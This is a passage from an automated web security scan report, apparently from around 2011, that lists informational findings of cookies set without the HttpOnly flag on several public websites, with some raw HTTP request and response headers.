last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%222%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.904. http://www.x64bitdownload.com/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2239%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.905. http://www.x64bitdownload.com/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2240%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.906. http://www.x64bitdownload.com/categories/free-64-bit-communications-downloads-3-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-downloads-3-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.907. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2241%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.908. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2242%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.909. http://www.x64bitdownload.com/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2243%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.910. http://www.x64bitdownload.com/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.911. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2248%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.912. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2249%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.913. http://www.x64bitdownload.com/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2245%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.914. http://www.x64bitdownload.com/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2246%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.915. http://www.x64bitdownload.com/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2247%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.916. http://www.x64bitdownload.com/categories/free-64-bit-desktop-downloads-4-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-desktop-downloads-4-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%224%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.917. http://www.x64bitdownload.com/categories/free-64-bit-development-downloads-5-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-development-downloads-5-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%225%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.918. http://www.x64bitdownload.com/categories/free-64-bit-education-downloads-6-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-education-downloads-6-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%226%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.919. http://www.x64bitdownload.com/categories/free-64-bit-games-entertainment-downloads-7-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-games-entertainment-downloads-7-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%227%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.920. http://www.x64bitdownload.com/categories/free-64-bit-graphic-apps-downloads-8-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-graphic-apps-downloads-8-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%228%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.921. http://www.x64bitdownload.com/categories/free-64-bit-home-hobby-downloads-9-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-home-hobby-downloads-9-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%229%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.922. http://www.x64bitdownload.com/categories/free-64-bit-multimedia-design-downloads-258-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-multimedia-design-downloads-258-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A3%3A%22258%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.923. http://www.x64bitdownload.com/categories/free-64-bit-network-internet-downloads-10-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-network-internet-downloads-10-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2210%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.924. http://www.x64bitdownload.com/categories/free-64-bit-security-privacy-downloads-11-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-security-privacy-downloads-11-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2211%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.925. http://www.x64bitdownload.com/categories/free-64-bit-servers-downloads-12-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-servers-downloads-12-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2212%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.926. http://www.x64bitdownload.com/categories/free-64-bit-system-utilities-downloads-13-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-system-utilities-downloads-13-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2213%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.927. http://www.x64bitdownload.com/categories/free-64-bit-web-development-downloads-14-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-web-development-downloads-14-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2214%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.928. http://www.x64bitdownload.com/categories/free-64-bit-widgets-downloads-304-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-widgets-downloads-304-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A3%3A%22304%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.929. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-ozum-download-lhtivuds.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

downloadsite=2k9hcu88qhiq0oc88olgcs7f73; expires=Sat, 23 Jul 2011 14:54:37 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.930. http://www.x64bitdownload.com/drivers/64-bit-vista-drivers.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/drivers/64-bit-vista-drivers.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22vista%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22vista%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.931. http://www.yencode.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yencode.org
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

h=0f3405bcfd70171c7c84f1086ca726c7; path=/
R=c%253EfXWvZ3%253Al%255BT6wdnd%253E%2527tfbsdi%2560uzqf%253Etfbsdi%2527f%253Evt%253CVT%253C5%253C2%253C2%253C56911935%253Ctuzmf2%25605%252Fdtt%253C3%253Cjoufsdptnpt%2560bggjmjbuf%25603%2560e3s%2560efsq%253Ceoqbslfehppe%253Ceoqbslfehppe%253C6174896%253C282%253Cdmfbo%253C%253C0e0tfbsdi0q0tuboebse0ynm0epnbjomboefs0joum0e3s0gmfy0w30%253Cenynm%252Fjoufsdptnpt%252Fpwfsuvsf%252Fdpn%2527jqvb%2560je%253E1g4516cdge81282d8d95g2197db837d8%2527enybsht%253E17pFOzb5%255BH2ZT7wPMKxqMjGekH%253A2JDschPTuQxP5fI1%2560Hf5eu%255BB.qDvh3k%255BJYwBby84RwLgccHR%2560rGtC%253AcDNoHl%253AQoLgoufM2K%2560XF7XBHFU8mQm89qdjeZxRKigOcb6IlBJuM3btd1Q24.Ch2Yknb6Mme1Zy.PVd3TJH3IIeekgGumCCVZwz%2560%255BGLuIck.2-ZU1%257BP3t%253AOR%252F%252F; expires=Mon, 24-Jan-2011 15:45:08 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.yencode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:08 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.11
Set-Cookie: h=0f3405bcfd70171c7c84f1086ca726c7; path=/
Set-Cookie: R=c%253EfXWvZ3%253Al%255BT6wdnd%253E%2527tfbsdi%2560uzqf%253Etfbsdi%2527f%253Evt%253CVT%253C5%253C2%253C2%253C56911935%253Ctuzmf2%25605%252Fdtt%253C3%253Cjoufsdptnpt%2560bggjmjbuf%25603%2560e3s%2560efsq%253Ceoqbslfehppe%253Ceoqbslfehppe%253C6174896%253C282%253Cdmfbo%253C%253C0e0tfbsdi0q0tuboebse0ynm0epnbjomboefs0joum0e3s0gmfy0w30%253Cenynm%252Fjoufsdptnpt%252Fpwfsuvsf%252Fdpn%2527jqvb%2560je%253E1g4516cdge81282d8d95g2197db837d8%2527enybsht%253E17pFOzb5%255BH2ZT7wPMKxqMjGekH%253A2JDschPTuQxP5fI1%2560Hf5eu%255BB.qDvh3k%255BJYwBby84RwLgccHR%2560rGtC%253AcDNoHl%253AQoLgoufM2K%2560XF7XBHFU8mQm89qdjeZxRKigOcb6IlBJuM3btd1Q24.Ch2Yknb6Mme1Zy.PVd3TJH3IIeekgGumCCVZwz%2560%255BGLuIck.2-ZU1%257BP3t%253AOR%252F%252F; expires=Mon, 24-Jan-2011 15:45:08 GMT; path=/
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 31 Dec 2001 7:32:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

14.932. http://www.yootheme.com/license previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yootheme.com
Path:	/license

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

0a037d8aa01b5240628765e3d35f3802=fcc157f1a62351510d502dbf94d54b0d; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /license HTTP/1.1
Host: www.yootheme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:40:26 GMT
Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 0a037d8aa01b5240628765e3d35f3802=fcc157f1a62351510d502dbf94d54b0d; path=/
Last-Modified: Tue, 25 Jan 2011 04:40:26 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14130

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...

14.933. http://www.youtube.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PREF=f1=50000000; path=/; domain=.youtube.com; expires=Thu, 21-Jan-2021 16:01:43 GMT
GEO=930f412dd946c393c719c45b1db7c824cwsAAAAzVVOtwdbzTT2iZw==; path=/; domain=.youtube.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.934. http://www.youtube.com/results previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/results

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=f1=50000000; path=/; domain=.youtube.com; expires=Thu, 21-Jan-2021 16:01:47 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.935. http://www.youtube.com/subscribe_widget previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/subscribe_widget

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
GEO=0341a4aa07c201d99d06557f57bd4ecbcwsAAAAzVVOtwdbzTTzh+w==; path=/; domain=.youtube.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.936. http://www.zazzle.com/netlingo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.zazzle.com
Path:	/netlingo

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rfm=rf%3d238222574511555904%26rfd%3d348679991; path=/;
qsp=nu%3d%2fnetlingo%3frf%3d238222574511555904; path=/;
zm=AQABAAAA8wcAABRS51j4EtDi9_oXt9FxROJyObhwRurz-b1BlGyLguagTvY6WTBoBb1sgEeFFIX6rKczW8ChxGhUVBWXLHNva6BIym6yAoY-4StNvvJUN6oKQP5Gr9F6snKOWkSXH-nGNXDxyJQV; domain=.zazzle.com; path=/
zs=6502D26E-A4F0-4420-AEC5-26B4B55758F8%7c0%7c12940404058%7c; domain=.zazzle.com; expires=Tue, 01-Jan-2036 08:00:00 GMT; path=/
us=FA9F74DB-FD90-49BE-A241-2728DB49B0ED; domain=.zazzle.com; expires=Tue, 01-Jan-2036 08:00:00 GMT; path=/
s=5246001291012673539; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /netlingo?rf=238222574511555904 HTTP/1.1
Host: www.zazzle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.937. http://www.zazzle.com/netlingo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.zazzle.com
Path:	/netlingo

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

zshopurl=z%2fnetlingo; path=/
zm=AQABAAAA8wcAABTXMn3ZESMf_AapOt_c2LHphBNXMA5JPfT6gZUI8wuNU5G32qzfW8UK7aCUTmf44ZhwGkV-w3TWOo4zf3L1feOR19CmSKUwC-KzmxCF9Gui0H3lxIuicTJIjx3R9nwAzZSnJmkR; domain=.zazzle.com; path=/
zs=255EC80F-9BB5-440C-9150-9CB65A7DE4C8%7c0%7c12940404058%7c; domain=.zazzle.com; expires=Tue, 01-Jan-2036 08:00:00 GMT; path=/
us=98B57018-41A2-4493-8838-36A22CB611B1; domain=.zazzle.com; expires=Tue, 01-Jan-2036 08:00:00 GMT; path=/
s=5246001291012673539; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /netlingo HTTP/1.1
Host: www.zazzle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 178097
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="CAO DSP COR CUR ADMa DEVa OUR BUS UNI PRE"
Set-Cookie: BLITZEN-2600=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2602=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2604=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2606=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2608=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2610=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2612=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2614=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2616=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2618=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2620=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2622=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2700=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
